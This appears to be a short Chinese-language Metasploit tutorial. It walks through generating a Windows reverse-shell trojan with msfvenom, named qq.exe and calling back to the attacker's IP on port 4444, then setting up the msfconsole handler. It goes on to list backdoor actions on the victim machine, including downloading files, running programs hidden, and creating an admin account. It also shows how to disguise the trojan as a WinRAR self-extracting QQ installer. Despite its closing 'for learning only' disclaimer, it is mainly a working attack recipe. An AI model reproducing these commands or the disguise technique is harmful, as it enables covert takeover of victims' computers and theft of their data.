文章目录
1.生成木马2.启动msfconsole3.后门操作3.1 文件(文件,目录等)操作3.2 网络命令(net等)操作3.3 系统命令(权限,用户,用户组等)操作3.4 压缩工具(zip/rar等等)伪装操作3.5 FTP服务1.生成木马
使用msf模块中的msfvenom模块,生成.exe木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击主机IP地址 LPORT=4444 -f exe > /home/tim/桌面/qq.exe
2.启动msfconsole
msfconsole
设置payload参数
//开启监听use exploit/multi/handler
//设置tcp监听set payload windows/meterpreter/reverse_tcp
//设置攻击主机IPset LHOST 攻击主机IP地址
//设置监听端口set lport 4444
//执行run
执行成功以后,建立Meterpreter会话。
3.后门操作
3.1 文件(文件,目录等)操作
获得工作目录;列出目录文件
查看文件内容
下载文件到主机
编辑文件
3.2 网络命令(net等)操作
获取目标主机上的网络接口信息
显示目标主机的路由信息
3.3 系统命令(权限,用户,用户组等)操作
获得目标主机上正在运行的进程
执行目标主机的文件(隐藏运行)
获取目标主机系统信息
创建用户,并提权为管理员权限
3.4 压缩工具(zip/rar等等)伪装操作
Winrar制作自解压文件QQ安装.exe(PS:生成木马后创建自解压文件)
3.5 FTP服务
ftp://目标主机IP地址
上传和下载文件
PS:仅供安全学习和教学用途,禁止非法使用。